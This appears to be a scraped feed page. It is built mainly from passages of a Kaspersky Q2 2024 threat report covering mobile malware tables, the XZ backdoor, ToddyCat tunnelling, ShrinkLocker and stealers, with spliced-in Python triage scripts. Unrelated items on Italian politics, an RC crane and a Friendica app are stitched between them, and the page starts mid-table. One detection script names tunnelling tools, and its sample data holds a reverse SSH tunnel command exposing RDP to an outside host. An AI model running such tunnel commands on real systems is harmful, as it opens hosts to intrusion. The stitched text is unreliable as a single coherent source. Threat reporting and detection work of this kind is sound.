  Trojan.AndroidOS.Triada.ex              2.42     1.37    -1.05                -5
  Trojan-Banker.AndroidOS.Mamont.aq       0.00     1.36    +1.36
  Trojan-Downloader.AndroidOS.Agent.ms    1.39     1.34    -0.05                +5
  Trojan.AndroidOS.Triada.gh              0.00     1.31    +1.31
  Trojan-Downloader.AndroidOS.Agent.mm    2.12     1.29    -0.83                -8

The generalized cloud verdict DangerousObject.Multi.Generic returned to the top spot, and the cloud AI-delivered verdict DangerousObject.AndroidOS.GenericML also moved up. Also placing highly again were the Fakemoney Trojan, which scams users out of personal data with a promise of easy cash, the pre-installed Dwphon Trojan and modified versions of WhatsApp with built-in Triada modules. The latter include Trojan-Downloader.AndroidOS.Agent.ms.

The Mamont banking Trojan, which steals money by scanning text messages, saw quite a jump in its popularity.

Region-specific malware


This section describes malware whose activity is concentrated in specific countries.

  Verdict                                     Country*    %**
  Backdoor.AndroidOS.Tambir.a                 Turkey      99.51
  Trojan-Banker.AndroidOS.BrowBot.q           Turkey      99.30
  Trojan-Banker.AndroidOS.BrowBot.a           Turkey      98.88
  Backdoor.AndroidOS.Tambir.d                 Turkey      98.24
  Trojan-Banker.AndroidOS.Rewardsteal.dn      India       98.18
  Trojan-Banker.AndroidOS.UdangaSteal.k       India       97.44
  HackTool.AndroidOS.FakePay.c                Brazil      97.43
  Trojan-Banker.AndroidOS.Rewardsteal.c       India       97.03
  Trojan-Banker.AndroidOS.Agent.ox            India       96.97
  Trojan-Spy.AndroidOS.SmsThief.wk            India       96.92
  Trojan-Banker.AndroidOS.Rewardsteal.n       India       96.74
  Trojan-Banker.AndroidOS.UdangaSteal.f       Indonesia   96.40
  Backdoor.AndroidOS.Tambir.b                 Turkey      96.20
  Trojan-Dropper.AndroidOS.Hqwar.hc           Turkey      96.19
  Trojan-Banker.AndroidOS.Agent.pp            India       95.97
  Trojan-Banker.AndroidOS.UdangaSteal.b       Indonesia   95.23
  Trojan-Dropper.AndroidOS.Agent.sm           Turkey      95.11
  Trojan-SMS.AndroidOS.EvilInst.f             Thailand    95.05
  Trojan-SMS.AndroidOS.EvilInst.b             Thailand    94.64
  Trojan-Spy.AndroidOS.SmsThief.vb            Indonesia   94.57
  Trojan-Banker.AndroidOS.Coper.b             Turkey      94.31

*Country where the malware was most active.
**Unique users who encountered this Trojan modification in the given country as a percentage of all users of Kaspersky mobile solutions targeted by this modification.

Users in Turkey continue to face banking Trojan attacks. At the same time, the list of malware active in the country remains unchanged: the VNC backdoor Tambir, the text message-stealing Trojan BrowBot and Hqwar banking Trojan packers were already mentioned in a past report.

Indonesia still has the largest concentration of UdangaSteal Trojans for stealing text messages. These are often sent to victims under the guise of wedding invitations. Similar to the last quarter, the payment-simulating app FakePay was widespread in Brazil, while users in Thailand ran into the EvilInst Trojan, which sends paid text messages.

A large number of families centered in India made it to the top. Rewardsteal snatches banking data under the pretense of a money giveaway; SmsThief.wk and Agent.ox steal text messages.

Mobile banking Trojans


The number of new unique installation packages for banking Trojans remains at the same level for the third quarter straight.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2023 – Q2 2024

The total number of Trojan-Banker attacks is still on the rise, meaning that each new banking Trojan released by threat actors is increasingly used in attacks.

TOP 10 mobile bankers

  Verdict                                   Prev %   New %   Difference in p.p.   Change in ranking
  Trojan-Banker.AndroidOS.Mamont.aq         0.00     14.13   +14.13
  Trojan-Banker.AndroidOS.UdangaSteal.b     7.00     10.10   +3.10                +3
  Trojan-Banker.AndroidOS.Bian.h            10.21    7.46    -2.76                0
  Trojan-Banker.AndroidOS.GodFather.m       0.97     6.41    +5.44                +20
  Trojan-Banker.AndroidOS.Faketoken.z       1.39     5.17    +3.79                +14
  Trojan-Banker.AndroidOS.Mamont.am         0.00     5.12    +5.12
  Trojan-Banker.AndroidOS.Mamont.o          4.58     5.00    +0.42                -1
  Trojan-Banker.AndroidOS.Agent.pp          0.00     4.59    +4.59
  Trojan-Banker.AndroidOS.Agent.eq          13.39    4.51    -8.88                -8
  Trojan-Banker.AndroidOS.Svpeng.aj         0.95     3.74    +2.79                +15

Mobile ransomware Trojans


The number of ransomware installation packages decreased compared to Q1 2024 to roughly the same level as a year ago.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q2 2023 – Q2 2024

In the distribution of attacks, Rasket and Rkor ransomware dropped out of the top, and Pigetrl also fell. Other top-ranking families became markedly more active, not only percentage-wise, but in terms of absolute numbers.

  Verdict                                   Prev %   New %   Difference in p.p.   Change in ranking
  Trojan-Ransom.AndroidOS.Svpeng.ac         11.17    52.56   +41.39               +3
  Trojan-Ransom.AndroidOS.Congur.cw         10.96    52.41   +41.45               +3
  Trojan-Ransom.AndroidOS.Small.cj          10.49    49.76   +39.26               +3
  Trojan-Ransom.AndroidOS.Congur.ap         6.66     41.52   +34.86               +3
  Trojan-Ransom.AndroidOS.Svpeng.ah         6.03     35.62   +29.59               +4
  Trojan-Ransom.AndroidOS.Congur.bf         4.15     32.98   +28.83               +5
  Trojan-Ransom.AndroidOS.Svpeng.snt        5.72     25.72   +20.00               +3
  Trojan-Ransom.AndroidOS.Svpeng.ad         3.42     24.79   +21.37               +4
  Trojan-Ransom.AndroidOS.Svpeng.ab         3.32     24.60   +21.28               +5
  Trojan-Ransom.AndroidOS.Pigetrl.a         15.56    12.70   -2.86                -8

securelist.com/it-threat-evolu…



Minister Sangiuliano: "Never gave Boccia public money or G7 documents". But she contradicts him and publishes everything on Instagram


@Politica interna, europea e internazionale
Culture Minister Gennaro Sangiuliano breaks his silence and writes a letter to the daily La Stampa in which he assures that the Ministry never used public money to reimburse trips for Maria Rosaria



IT threat evolution Q2 2024



Targeted attacks

XZ backdoor: a supply chain attack in the making


On March 29, a message on the Openwall oss-security mailing list announced the discovery of a backdoor in XZ, a compression utility included in many popular Linux distributions. The backdoored library is used by the OpenSSH server process sshd. On a number of systemd-based distributions, including Ubuntu, Debian and RedHat/Fedora Linux, OpenSSH is patched to use systemd features and is therefore dependent on the library (Arch Linux and Gentoo are not affected). The code was inserted in February and March 2024, mostly by Jia Cheong Tan – probably a fictitious identity. We suspect that the goal of the attack was to introduce exclusive remote code execution capabilities into the sshd process by targeting the XZ build process; and then to push the backdoored code out to major Linux distributions as a part of a large-scale supply chain attack.

Timeline of events


2024.01.19 XZ website moved to GitHub pages by new maintainer (jiaT75)
2024.02.15 “build-to-host.m4” is added to .gitignore
2024.02.23 two “test files” containing the stages of the malicious script are introduced
2024.02.24 XZ 5.6.0 is released
2024.02.26 commit in CMakeLists.txt that sabotages the Landlock security feature
2024.03.04 the backdoor leads to issues with Valgrind
2024.03.09 two “test files” are updated, CRC functions are modified, Valgrind issue is “fixed”
2024.03.09 XZ 5.6.1 is released
2024.03.28 bug is discovered, Debian and RedHat notified
2024.03.28 Debian rolls back XZ 5.6.1 to version 5.4.5-0.2
2024.03.29 an email is published on the oss-security mailing list
2024.03.29 RedHat confirms backdoored XZ was shipped in Fedora Rawhide and Fedora Linux 40 beta
2024.03.30 Debian shuts down builds and starts process to rebuild them
2024.04.02 XZ main developer acknowledges backdoor incident

While earlier supply chain attacks we have seen in Node.js, PyPI, FDroid, and the Linux kernel consisted mostly of atomic malicious patches, fake packages and typo-squatted package names, this incident was a multi-stage operation that came close to compromising SSH servers on a global scale.

The backdoor in the liblzma library was introduced at two levels. The source code of the build infrastructure that generated the final packages was modified slightly (by introducing an additional file, build-to-host.m4) to extract the next-stage script hidden in a test-case file (bad-3-corrupt_lzma2.xz). This script, in turn, extracted a malicious binary component from another test-case file (good-large_compressed.lzma) that was linked into the legitimate library during compilation, so that the resulting package could be shipped to Linux repositories. Major vendors in turn shipped the malicious component in beta and experimental builds. The XZ compromise was assigned the identifier CVE-2024-3094 and the maximum CVSS score of 10.0.

The attackers’ initial goal was to hook one of the functions related to RSA key manipulation. In our analysis of the hook process, we focused on the behavior of the backdoor inside OpenSSH, specifically OpenSSH portable version 9.7p1 (the latest version at the time of the analysis). Our analysis revealed a number of interesting details about the backdoor’s functionality.

  • The attacker set an anti-replay feature to prevent possible capture or hijacking of the backdoor communications.
  • The author used a custom steganography technique in the x86 code to hide the public key.
  • The backdoor hooks the logging function to hide its logs of unauthorized connections to the SSH server.
  • The backdoor hooks the password authentication function to allow the attacker to use any username/password to log in to the infected server without any further verification. It does the same with public key authentication.
  • The backdoor has remote code execution capabilities that allow the attacker to execute any system command on the infected server.

It’s clear that this is a highly sophisticated threat. The attackers used social engineering to gain long-term access to the development environment and extended it with fake human interactions in plain sight. They have extensive knowledge of the internals of open-source projects such as SSH and libc, as well as expertise in code/script obfuscation used to initiate the infection process. A number of things make this threat unique, including the way the public key information is embedded in the binary code itself, complicating the recovery process, and the meticulous preparation of the operation.

Kaspersky products detect malicious objects associated with the attack as HEUR:Trojan.Script.XZ and Trojan.Shell.XZ. In addition, Kaspersky Endpoint Security for Linux detects malicious code in sshd process memory as MEM:Trojan.Linux.XZ (as part of the Critical Areas Scan task).

For more information, read our initial analysis, incident assessment and in-depth hook analysis.
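A quick local triage for the backdoored releases, as an added example that is not part of the Securelist report or of the XZ project: it parses the output of `xz --version` and `ldd sshd` (constructed samples are embedded below) and flags a host only when both conditions described above hold, a 5.6.0/5.6.1 liblzma and an sshd that actually loads it. Distributions may ship a cleaned build under the same version string, so treat a hit as a prompt to check the package changelog, not as proof of compromise.

```python
"""Triage helpers for the XZ/liblzma backdoor (CVE-2024-3094).

Added example; not code from the Securelist report or the XZ project.
It flags the two backdoored upstream releases (5.6.0 and 5.6.1) in the
output of `xz --version` and checks whether an sshd binary links
liblzma, the property that made systemd-patched OpenSSH builds reachable.
"""
import re
import shutil
import subprocess
from typing import Optional

BACKDOORED_VERSIONS = {"5.6.0", "5.6.1"}

# Constructed sample outputs (not captured from a real host).
SAMPLE_XZ_VERSION = "xz (XZ Utils) 5.6.1\nliblzma 5.6.1\n"
SAMPLE_LDD = (
    "\tlinux-vdso.so.1 (0x00007ffd4b5f9000)\n"
    "\tlibsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f2c1a400000)\n"
    "\tliblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f2c1a3c0000)\n"
    "\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2c1a000000)\n"
)


def parse_xz_version(output: str) -> Optional[str]:
    """Extract the library version from `xz --version` output.

    Upstream prints two lines ("xz (XZ Utils) 5.6.1" and "liblzma 5.6.1").
    The liblzma line is preferred because sshd loads the shared library,
    not the xz command-line tool.
    """
    m = re.search(r"^liblzma\s+(\d+\.\d+\.\d+)", output, re.MULTILINE)
    if m is None:
        m = re.search(r"xz \(XZ Utils\)\s+(\d+\.\d+\.\d+)", output)
    return m.group(1) if m else None


def is_backdoored_version(version: Optional[str]) -> bool:
    return version is not None and version in BACKDOORED_VERSIONS


def sshd_links_liblzma(ldd_output: str) -> Optional[str]:
    """Return the resolved liblzma path from `ldd sshd` output, or None.

    Only builds that pull in liblzma (directly or through libsystemd, as
    on Debian, Ubuntu and Fedora) can reach the backdoor code.
    """
    for line in ldd_output.splitlines():
        m = re.match(r"\s*(liblzma\.so[\w.]*)\s*=>\s*(\S+)", line)
        if m:
            return m.group(2)
    return None


def assess(xz_version_output: str, ldd_output: str) -> dict:
    """Combine both checks; at_risk is True only when both indicators hold."""
    version = parse_xz_version(xz_version_output)
    lib = sshd_links_liblzma(ldd_output)
    at_risk = is_backdoored_version(version) and lib is not None
    return {"liblzma_version": version, "sshd_liblzma": lib, "at_risk": at_risk}


def _run(cmd):
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    except OSError:
        return ""


if __name__ == "__main__":
    sshd = shutil.which("sshd") or "/usr/sbin/sshd"
    print(assess(_run(["xz", "--version"]), _run(["ldd", sshd])))
```

Run it as root on the host being triaged; the `ldd` step needs the real sshd path, which is usually outside `$PATH`, hence the `/usr/sbin/sshd` fallback.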

DuneQuixote campaign targeting the Middle East


In February, we discovered a new malware campaign targeting government entities in the Middle East that we dubbed DuneQuixote. Our investigation uncovered more than 30 DuneQuixote dropper samples being actively used in this campaign. Some were regular droppers, while others were manipulated installer files for a legitimate tool called Total Commander. The droppers carried malicious code to download a backdoor that we dubbed CR4T. While we have only identified two of these implants, we strongly believe that there may be more in the form of completely different malware. The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion techniques in both network communications and the malware code.

The initial dropper is a Windows x64 executable file, written in C/C++, although there are DLL versions of the malware that provide the same functionality. Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls are primarily string comparison functions that are executed without any conditional jumps based on the comparison results. The strings specified in these functions are snippets of Spanish poetry. These vary from one sample to the next, changing the signature of each sample to evade traditional detection methods.

The primary goal of the CR4T implant is to give attackers access to a console for command line execution on the infected computer. It also facilitates the download, upload and modification of files.

We also discovered a Golang version of the CR4T implant that has similar capabilities to the C version. A notable difference of this version is the ability to create scheduled tasks using the Golang Go-ole library, which uses Windows Component Object Model (COM) object interfaces to interact with the Task Scheduler service.

Through the use of memory-only implants and droppers masquerading as legitimate software that mimics the Total Commander installer, the attackers demonstrate above-average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and ingenuity of the threat actor behind this campaign.

ToddyCat: punching holes in your infrastructure


The threat actor ToddyCat predominantly targets government organizations in the Asia-Pacific region, primarily to steal sensitive data. In our previous article, we described the tools the attackers use to collect and exfiltrate files (LoFiSe and PcExter). More recently, we examined how this threat actor maintains constant access to compromised infrastructure, the information they are interested in and the tools they use to extract it.

Our investigation revealed that ToddyCat was stealing data on an industrial scale. To steal large volumes of data, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor the systems they attack.

ToddyCat used several methods to accomplish this. One was to create a reverse SSH tunnel. They launched this using the SSH client from the OpenSSH for Windows toolkit, along with the library required to run it, an OpenSSH private key file, and a script, a.bat, that hides the private key file. The attackers transferred the files to the target host via SMB using shared folders.

The threat actor also made use of the server utility (VPN Server) from the SoftEther VPN package for tunneling. This package is an open-source solution developed as part of academic research at the University of Tsukuba, which allows the creation of VPN connections using a variety of popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.

Another way ToddyCat accessed remote infrastructure was by tunneling to a legitimate cloud provider: an application running on the user’s host with access to the local infrastructure can connect to the cloud through a legitimate agent and redirect traffic or execute specific commands.

Ngrok is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed Ngrok on target hosts and used it to redirect command and control (C2) traffic from the cloud infrastructure to a specific port on those hosts.

They also used Krong, a proxy that uses XOR to encrypt the data passing through it, thereby concealing the content of the traffic to avoid detection.

After creating tunnels on the target hosts using OpenSSH or SoftEther VPN, the threat actor also installed the FRP client, a fast reverse proxy written in Go that allows access from the internet to a local server behind a NAT or firewall.

ToddyCat used various tools to collect data. They used one of the tools, which we named “cuthead” (the name came from the file description field of the sample we found), to search for documents. They used “WAExp”, a WhatsApp data stealer, to search for and collect browser local storage files containing data from the web version of WhatsApp. The attackers also used a tool called “TomBerBil” to steal passwords from browsers.

To protect against such attacks, we recommend that organizations add the resources and IP addresses of cloud services that provide traffic tunneling to the corporate firewall denylist. We also recommend limiting the range of tools administrators may use to access hosts remotely: any other tool should either be prohibited or closely monitored as a possible indicator of suspicious activity. In addition, employees should avoid storing passwords in browsers, since this helps attackers gain access to sensitive information, and password reuse across services increases the amount of data available to an attacker who obtains one of them.
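Detection logic for the tunnelling toolset described above, as an added example that is not Kaspersky's code or telemetry: a few rules run over constructed process-creation and outbound-connection events and flag reverse SSH tunnels (`ssh -R`), SoftEther VPN Server, the ngrok agent and the FRP client, plus connections to tunnelling-provider domains of the kind the recommendation says to deny at the perimeter. The event fields, binary names and the domain list are assumptions made for the demo; map them to your EDR schema and to the providers' published endpoints before deploying.

```python
"""Hunt for the interactive tunnelling tools ToddyCat relied on.

Added example, not Kaspersky's code or telemetry. Event schema, binary
names and provider domains are assumptions for the demo.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass
class ProcEvent:
    host: str
    image: str    # full path of the launched binary
    cmdline: str


@dataclass
class NetEvent:
    host: str
    image: str
    dest: str     # hostname the process resolved or connected to


# Tunnelling providers to deny at the firewall (illustrative, not exhaustive).
TUNNEL_DOMAINS = ("ngrok.io", "ngrok-free.app", "ngrok-agent.com", "ngrok.com")

# (rule name, regex on the image basename, regex on the command line).
# An empty command-line regex means the binary name alone is enough.
RULES = [
    # ssh -R publishes a local port on the remote host: a reverse tunnel.
    ("reverse_ssh_tunnel", r"ssh(\.exe)?", r"(^|\s)-R\s*\d"),
    ("softether_vpnserver", r"vpnserver(_x64)?(\.exe)?", ""),
    ("ngrok_agent", r"ngrok(\.exe)?", r"(^|\s)(tcp|http|tls|start)(\s|$)"),
    ("frp_client", r"frpc(\.exe)?", r"(^|\s)-c\s"),
]


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def match_process(ev: ProcEvent) -> Optional[str]:
    """Return the first rule whose image and command-line patterns both match."""
    name = basename(ev.image)
    for rule, image_re, cmd_re in RULES:
        if re.fullmatch(image_re, name) and (not cmd_re or re.search(cmd_re, ev.cmdline, re.I)):
            return rule
    return None


def match_network(ev: NetEvent) -> Optional[str]:
    """Flag destinations that are a denylisted provider domain or a subdomain of one."""
    dest = ev.dest.lower().rstrip(".")
    for domain in TUNNEL_DOMAINS:
        if dest == domain or dest.endswith("." + domain):
            return "tunnel_provider:" + domain
    return None


def hunt(procs: Iterable[ProcEvent], nets: Iterable[NetEvent]) -> List[dict]:
    findings = []
    for ev in procs:
        rule = match_process(ev)
        if rule:
            findings.append({"host": ev.host, "rule": rule, "evidence": ev.cmdline})
    for ev in nets:
        rule = match_network(ev)
        if rule:
            findings.append({"host": ev.host, "rule": rule, "evidence": f"{ev.image} -> {ev.dest}"})
    return findings


# Constructed sample telemetry (not real incident data).
SAMPLE_PROC = [
    ProcEvent("srv01", r"C:\Windows\System32\OpenSSH\ssh.exe",
              r"ssh.exe -i C:\ProgramData\id_rsa -N -R 0.0.0.0:9999:127.0.0.1:3389 user@203.0.113.5"),
    ProcEvent("srv01", r"C:\ProgramData\vpnserver_x64.exe", "vpnserver_x64.exe"),
    ProcEvent("ws07", r"C:\Users\a\AppData\Local\Temp\ngrok.exe", "ngrok.exe tcp 3389"),
    ProcEvent("ws07", r"C:\Temp\frpc.exe", "frpc.exe -c frpc.ini"),
    ProcEvent("ws02", r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe admin@10.0.0.5"),  # benign
    ProcEvent("ws02", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
SAMPLE_NET = [
    NetEvent("ws07", "ngrok.exe", "tunnel.us.ngrok.com"),
    NetEvent("ws02", "chrome.exe", "www.example.com"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_PROC, SAMPLE_NET):
        print(f"{f['host']}: {f['rule']} <- {f['evidence']}")
```

The SSH rule keys on the `-R` flag only, so a combined `-NR` form or a renamed binary would slip past it; pair it with an allowlist of the remote-administration tools your admins are permitted to run, as the text recommends, and alert on anything else that opens a listener or tunnel.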

Other malware

QakBot attacks with Windows zero-day


In early April we investigated the Windows DWM (Desktop Window Manager) Core Library Elevation of Privilege Vulnerability (CVE-2023-36033), which was previously discovered as a zero-day being exploited in the wild. While searching for samples related to this exploit and attacks using it, we found a curious document uploaded to VirusTotal on April 1. This document caught our attention because it had a descriptive file name indicating that it contained information about a Windows vulnerability.

Inside we found a brief description of a Windows DWM vulnerability and how it could be exploited to gain system privileges – all written in very poor English. The exploitation process described in this document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033 – but the vulnerability was different.

The poor quality of the writing, and the fact the document was missing some important details about how to actually trigger the vulnerability, suggested that the vulnerability described was completely made up or was present in code that could not be accessed or controlled by attackers.

However, a quick check revealed that this was a real zero-day vulnerability that could be used to escalate privileges, so we immediately reported our findings to Microsoft. The vulnerability was assigned CVE-2024-30051 and a patch was released as part of Patch Tuesday on May 14.

We also began closely monitoring our statistics for exploits and attacks using this zero-day, and in mid-April we discovered an exploit. We have seen this zero-day used in conjunction with QakBot and other malware, and believe that multiple threat actors have access to it.

Kaspersky products detect the exploitation of CVE-2024-30051 and related malware with the following verdicts:

  • PDM:Exploit.Win32.Generic;
  • PDM:Trojan.Win32.Generic;
  • UDS:DangerousObject.Multi.Generic;
  • Win32.Agent.gen;
  • Win32.CobaltStrike.gen.


Using the LockBit builder to generate targeted ransomware


Last year, we published our research on the LockBit 3.0 builder. Leaked in 2022, this builder greatly simplified the creation of custom ransomware.


The keygen.exe file generates public and private keys used for encryption and decryption. The builder.exe file generates the variant according to the options set in the config.json file. The whole process is automated by the build.bat script.


The builder also allows attackers to choose exactly what they want to encrypt. If they know enough about the target’s infrastructure, they can create malware tailored to the specific configuration of the target’s network architecture, such as important files, administrative accounts and critical systems.

This has allowed attackers to generate customized versions of this threat to suit their needs, making their attacks more effective.

In February, the international law enforcement task force Operation Cronos gained insight into LockBit’s operations after taking down the group. The operation involved law enforcement agencies from 10 countries. They were able to seize the group’s infrastructure, obtain private decryption keys and create a decryption toolset based on a list of known victim IDs obtained by the authorities. However, just a few days later, the ransomware group announced that it was back in action.

In a recent incident response engagement, we were faced with a ransomware attack that involved a sample created with the same leaked builder. The attackers had found administrator credentials stored in plain text. They created a custom version of the ransomware that used those credentials to spread across the network and perform malicious actions such as disabling Windows Defender and clearing Windows Event Logs before encrypting data, to cover its tracks. In one of our latest articles, we revisited the LockBit 3.0 builder files and analyzed the steps the attackers took to compromise the network.

Stealers, stealers and more stealers


Stealers are a prominent feature of the threat landscape. They are designed to harvest passwords and other sensitive data from infected computers that can then be used in other attacks, resulting in financial loss to the target. Over the past year we have published a number of public and private reports on newly discovered stealers. We recently wrote reports on Acrid, ScarletStealer and Sys01: the first two are new, the latter has been updated.

Acrid, a new stealer discovered in December 2023, is written in C++ and compiled as a 32-bit binary, despite the fact that most systems are now 64-bit. Upon closer inspection, it became apparent that the authors chose a 32-bit build in order to use the “Heaven’s Gate” technique, which lets a 32-bit process switch into 64-bit mode to bypass certain security controls. This malware is designed to steal browser data, local cryptocurrency wallets, files with specific names (wallet.dat, password.docx, etc.) and credentials from installed applications (FTP managers, messengers, etc.). The collected data is zipped and sent to the C2.

Last January, we analyzed a downloader we dubbed “Penguish”. One of the payloads it downloaded was a previously unknown stealer called “ScarletStealer” – an odd stealer, since most of its functionality is contained in other binaries (applications and Chrome extensions) that it downloads. When ScarletStealer is executed, it checks for the presence of cryptocurrencies and crypto wallets by looking for certain folder paths (e.g., %APPDATA%\Roaming\Exodus). If anything is detected, it starts downloading the additional executables using PowerShell. Most ScarletStealer executables are digitally signed. This stealer is very underdeveloped in terms of functionality and contains many bugs, errors, and redundant code. Considering the effort it takes to install the malware through a long chain of downloaders, the last of which is Penguish, it’s strange that it’s not more advanced.

SYS01 (aka Album Stealer and S1deload Stealer), a relatively unknown malware that has been around since at least 2022, has evolved from a C# stealer to a PHP stealer. What hasn’t changed is the infection vector. Users are tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page.


The archive contains a legitimate binary that sideloads a malicious DLL. This DLL opens an adult video and executes the next payload, which is a malicious PHP file encoded with ionCube. The executed PHP file calls a script, install.bat, which ultimately executes the next stage by running a PowerShell command. This layer is conveniently named “runalayer” and runs what appears to be the final payload called “Newb”. However, we found a difference between the latest version and the previous publicly disclosed versions of the stealer. The current stealer (Newb) includes functionality to steal Facebook-related data and send stolen browser data to the C2. It also contains backdoor functionality. However, we found that the code that actually collects the browser data sent by Newb is in a different sample named “imageclass”. It is not 100% clear how imageclass was pushed to the system; but looking at the backdoor code of Newb, we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine. The initial ZIP archive also contains another malicious PHP file, include.php: this has similar backdoor functionality to Newb and accepts many of the same commands in the same format.

ShrinkLocker: turning BitLocker into a ransomware utility


During a recent incident response engagement, we discovered ransomware called “ShrinkLocker” that uses BitLocker to encrypt compromised computers. BitLocker is the full-disk encryption utility built into Windows that is designed to prevent data exposure on lost or stolen computers.

ShrinkLocker is implemented as a sophisticated VBScript. If the script detects that it is running on Windows 2000, XP, 2003 or Vista, it exits. On later versions of Windows, it runs the portion of its code appropriate to the specific operating system. ShrinkLocker shrinks the computer’s drive partitions by 100MB and uses the freed space to create a boot partition for itself. The malware modifies the registry to configure BitLocker with the attacker’s settings. It then disables and removes all default BitLocker protectors to prevent key recovery, and enables the numerical password protector. The script generates this password itself and initiates encryption of all local drives before sending the password and system information to the attacker’s C2 server. Finally, the malware deletes itself and reboots the system.

If the user tries to use the recovery option while the computer is booting, they will see a message stating that no BitLocker recovery options are available.


ShrinkLocker changes the labels of all system drives to the attacker’s email address instead of leaving a ransom note.


You can read our full analysis of ShrinkLocker here.
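An audit for the two traits ShrinkLocker leaves behind, as an added example that is not Kaspersky's code or the malware itself: a volume whose only remaining protector is a numerical password (the default TPM and recovery protectors having been removed), and a drive label rewritten to an e-mail address. The script parses the output of `manage-bde -protectors -get <drive>`; the output layout assumed here (a "Volume X: [label]" header followed by protector names indented by four spaces) and the embedded sample text are assumptions made for the demo.

```python
"""Audit BitLocker key protectors for the ShrinkLocker pattern.

Added example; not Kaspersky's code or the malware. The manage-bde
output layout and the sample text below are assumptions for the demo.
"""
import re
import subprocess
import sys
from typing import Dict, List

VOLUME_RE = re.compile(r"^Volume ([A-Z]): \[(.*)\]\s*$")
# Protector type names sit at four spaces of indentation; their ID and
# password details are indented further and therefore do not match.
PROTECTOR_RE = re.compile(r"^ {4}([A-Za-z][A-Za-z ]+):\s*$")


def parse_protectors(text: str) -> Dict[str, dict]:
    """Return {drive_letter: {"label": str, "protectors": [type, ...]}}."""
    volumes: Dict[str, dict] = {}
    current = None
    for line in text.splitlines():
        m = VOLUME_RE.match(line)
        if m:
            current = m.group(1)
            volumes[current] = {"label": m.group(2), "protectors": []}
            continue
        m = PROTECTOR_RE.match(line)
        if m and current is not None:
            volumes[current]["protectors"].append(m.group(1))
    return volumes


def assess_volumes(volumes: Dict[str, dict]) -> List[dict]:
    """Flag volumes that look like ShrinkLocker reconfigured them."""
    findings = []
    for letter, info in volumes.items():
        reasons = []
        if info["protectors"] == ["Numerical Password"]:
            reasons.append("only_numerical_password")
        if "@" in info["label"]:
            reasons.append("label_looks_like_email")
        if reasons:
            findings.append({"volume": letter, "label": info["label"], "reasons": reasons})
    return findings


# Constructed sample output (assumed layout, not captured from a real host).
SAMPLE_OUTPUT = """\
BitLocker Drive Encryption: Configuration Tool version 10.0.19041
Copyright (C) 2013 Microsoft Corporation. All rights reserved.

Volume C: [attacker@example.com]
All Key Protectors

    Numerical Password:
      ID: {11111111-2222-3333-4444-555555555555}
      Password:
        111111-222222-333333-444444-555555-666666-777777-888888

Volume D: [Data]
All Key Protectors

    TPM:
      ID: {66666666-7777-8888-9999-000000000000}
      PCR Validation Profile:
        7, 11

    Numerical Password:
      ID: {aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}
      Password:
        999999-888888-777777-666666-555555-444444-333333-222222
"""


def query_host(drives: List[str]) -> str:
    """Run manage-bde for each drive and concatenate its output."""
    out = []
    for d in drives:
        try:
            proc = subprocess.run(["manage-bde", "-protectors", "-get", d],
                                  capture_output=True, text=True, check=False)
            out.append(proc.stdout)
        except OSError as exc:
            sys.exit(f"manage-bde not available: {exc}")
    return "".join(out)


if __name__ == "__main__":
    text = query_host(sys.argv[1:] or ["C:"])
    for f in assess_volumes(parse_protectors(text)):
        print(f"{f['volume']}: [{f['label']}] {', '.join(f['reasons'])}")
```

A healthy domain-joined machine normally shows a TPM (or TPM And PIN) protector alongside the numerical password, and the recovery password is escrowed in Active Directory; a volume that has lost its TPM protector and carries a label with an "@" in it warrants an immediate look at recent BitLocker and WMI activity.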


securelist.com/it-threat-evolu…


Three years ago, #FDroid had a similar kind of attempt as the #xz #backdoor. A new contributor submitted a merge request to improve the search, which was oft requested but the maintainers hadn't found time to work on. There was also pressure from other random accounts to merge it. In the end, it became clear that it added a #SQLinjection #vuln. In this case, we managed to catch it before it was merged. Since similar tactics were used, I think it's relevant now

gitlab.com/fdroid/fdroidclient…




3D Printed RC Crane Has Epic 3-Foot Reach



Have you ever looked out the window at traffic and seen a giant crane driving along the road? Have you ever wanted a little 3D printed version you could drive for yourself without the risk of demolishing your neighbor’s house? Well, [ProfessorBoots] has just the build for you.

The build, inspired by the Liebherr LTM 1300, isn’t just a little RC car that looks like a crane. It’s a real working crane, too! So you can drive this thing around, and you can park it up. Then you can deploy the fully working stabilizer booms like you’re some big construction site hot shot. From there, you can relish in the subtle joy of extending the massive three-foot boom while the necessary counterweight automatically locks itself in place. You can then use the crane to lift and move small objects to your heart’s content.

The video describes how the build works in intimate detail, from the gears and linkages all the way up to the grander assembly. It’s no simple beast either, with ten gearmotors, four servos, and two ESP32s used for control. If you really need to build one for yourself, [ProfessorBoots] sells his plans on his website.

We’ve seen great stuff from [ProfessorBoots] before—he’s come a long way from his skid steer design last year. Video after the break.

youtube.com/embed/faC3Yzz9IqI?…

Thanks to [Hudson Bazemore] for the tip!


hackaday.com/2024/09/03/3d-pri…



@ new version released, 0.1.0-alpha18! This is mainly a bugfix release, containing layout improvements, display of a blurred version of images while they load, propagation of post/user update events between screens, the ability to add a new account directly from the account-management bottom sheet, the distinction between editable and default circles, plus a new screen with information about the current instance (reachable from the side menu). In the coming days: handling of direct messages (a Friendica-specific feature). #friendica #friendicadev #androidapp #androiddev #fediverseapp #opensource #kotlin #kmp #compose #livefasteattrash




HackerHood from RHC discovers a new 0-day in Zyxel products


